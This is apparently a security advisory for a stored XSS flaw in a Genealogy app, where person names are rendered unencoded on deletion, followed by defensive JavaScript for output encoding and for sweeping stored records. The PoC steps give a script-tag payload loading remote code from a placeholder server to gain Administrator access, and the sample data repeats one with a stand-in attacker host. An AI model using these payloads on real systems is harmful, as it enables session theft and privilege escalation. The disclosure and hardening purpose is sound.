Authenticated Stored Cross-Site Scripting (XSS) in Genealogy app prior to 4.4.0 allows arbitrary JavaScript execution and privilege escalation from Editor+ role to Administrator.
- Vulnerability type: Stored Cross-Site Scripting (CWE-79)
- Affected component: 'Person' firstname and lastname.
- Affected versions: All versions prior to 4.4.0
- Impact: Persistent execution of attacker-supplied JavaScript in victims’ browsers; session hijacking, CSRF via DOM, UI redress, credential theft, or arbitrary actions as the victim.
- Attack vector: Authenticated (any role that can create a new person, i.e. Editor and above)
Root cause: Inadequate server-side sanitisation/encoding of the person's firstname/lastname, which are rendered unencoded after a higher-privileged user successfully deletes that person.
PoC:
- Authenticate to the application (editor+ role).
- Create a new person (it does not necessarily need to be assigned to any family).
- Include the JavaScript as either the first name or the last name of the added person:
<script src='yourserver/poc.js'></script> (edit poc.js to put your email address in the placeholder).
- Once a privileged user attempts to delete the newly added person, you will receive an invite to the platform at the provided email address with the role of Administrator.
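As an added illustration of the root cause described above (not code from the Genealogy project, whose view layer is not shown in this report; the field names, the sweep pattern and the sample records are assumptions), the unencoded rendering pattern beside its encoded form, plus a post-upgrade sweep for person records that already carry markup:

```javascript
// Added illustrative example; not code from the Genealogy project.
// Field names (id, firstname, lastname) are assumed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that change meaning in an HTML text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored names are concatenated into the "person deleted"
// notice unencoded, so markup in a name becomes live HTML in the browser of
// whoever performs the delete (the higher-privileged user in this report).
function deleteNoticeUnsafe(person) {
  return `<div class="alert">Person ${person.firstname} ${person.lastname} deleted.</div>`;
}

// Hardened pattern: every untrusted field is encoded at the point of output.
function deleteNoticeSafe(person) {
  return `<div class="alert">Person ${escapeHtml(person.firstname)} ` +
         `${escapeHtml(person.lastname)} deleted.</div>`;
}

// Defence in depth at creation time. Real names legitimately contain apostrophes
// (O'Brien) and accents, so only angle brackets are rejected here; output
// encoding above remains the primary control.
function isAcceptableName(value) {
  return typeof value === 'string' && value.trim().length > 0 &&
         value.length <= 100 && !/[<>]/.test(value);
}

// After patching, sweep existing records: a stored payload stays in the
// database until it is found and removed. Returns the ids of suspect persons.
// The pattern is an assumed heuristic, not a complete detector.
const MARKUP_PATTERN = /<[a-z!\/]|javascript:|on[a-z]+\s*=/i;
function findSuspectPersons(persons) {
  return persons
    .filter((p) => MARKUP_PATTERN.test(p.firstname) || MARKUP_PATTERN.test(p.lastname))
    .map((p) => p.id);
}

// Constructed sample records for demonstration.
const SAMPLE_PERSONS = [
  { id: 1, firstname: 'Mary', lastname: "O'Brien" },
  { id: 2, firstname: '<script src="https://attacker.invalid/poc.js"></script>', lastname: 'Doe' },
  { id: 3, firstname: 'John', lastname: 'Smith' },
];
```

Running the sweep against the real table is the check a practitioner wants after upgrading to 4.4.0, since the fix stops new injection but does not clean names stored before it.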